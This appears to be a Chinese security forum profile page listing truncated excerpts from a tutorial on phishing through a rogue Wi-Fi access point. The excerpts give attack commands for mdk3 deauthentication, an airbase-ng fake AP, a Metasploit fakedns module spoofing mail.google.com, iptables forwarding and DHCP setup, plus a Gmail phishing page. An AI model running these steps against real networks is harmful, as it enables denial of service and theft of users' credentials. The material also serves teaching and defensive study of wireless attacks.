论坛首页
任务活动
问答
论坛专题
登录
注册
features
+ 关注
粉丝
1
|
主题
41
|
回帖
463
加好友
私信
帖子
主题
回复
评论
无线安全: 通过伪AP进行DHCP+DNS劫持的钓鱼攻击
2019-9-7 17:42
SimpleLink 论坛
33
4109
使用MDK将客户端强制踢下线,迫使其连接到我们的伪AP上 mdk3 mon0 d -s 120 -c 1,6,11 ...
启动DNS msfconsole use auxiliary/server/fakedns show options set TARGETACTION FAKE set TARGETDOMAIN ...
Iptables流量牵引 echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 10.0.0.0/ ...
启动DHCP ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route ad ...
启动伪AP airbase-ng mon0 -e "AirJ" -c 1
我们了解到以下信息 1. SSID(WiFi名称): AirJ 2. 加密方式: OPEN 3. 信道: 1
探测目标客户端所连接的AP,为伪AP的架设作准备 airodump-ng mon0
3. 攻击重现实验 至此,我们已经解决了这个攻击姿势中所涉及到的所有技术难点,我们来从头梳理、重现一遍 ...
这里我们使用无线DOS工具MDK3,它能够发起如下攻击: 1. Beacon Flood Mode 我们知道,Beacon(管理帧)是AP ...
0x5: Deauth/DOS拒绝服务攻击 至此,我们已经理清了一个伪AP钓鱼劫持的攻击过程中涉及到的技术,但是,还 ...
为了说明原理,我们的钓鱼页面可以这样简单的code一下 可以看到,劫持前,用户正在正常的访问GMAIL邮箱 ...
0x5: XSS中的同源策略 我们已经将用户访问mail.google.com的流量劫持到了我们的钓鱼页面 客户端连接上我 ...
要注意的是: 1. fakedns这个msf模块只会劫持我们设置的域名,在本例中是mail.google.com 2. 对于其他的非 ...
配置方法如下: use auxiliary/server/fakedns show options set TARGETACTION FAKE set TARGETDOMAIN mail ...
0x4: DNS配置 我们在DHCP服务器的配置文件中指定客户端的默认DNS为伪AP所在的本机(10.0.0.1) 所以,我 ...
0x3: Iptables流量牵引 我们目前通过伪AP、以及伪DHCP的架设,将目标客户端的流量都劫持到了我们的无线虚 ...
#启动DHCP服务 这里要重点关注的是网关(option routers 10.0.0.1)的设置,我们的伪AP的IP地址也要设置成同 ...
#启动伪AP,激活at0网口 在启动DHCP之前,要先启动伪AP,激活at0网口 ifconfig wlan1 up airmon-ng start ...
#安装DHCP服务 apt-get -y install dhcp3-server 安装过程中遇到错误: Errors were encountered while pr ...
我们手工搭建一个DHCP服务器 #将网卡设置为静态IP vim /etc/network/interfaces auto eth0 #iface eth0 i ...
前一页
16
17
18
19
20
21
22
后一页
2
3
近期访客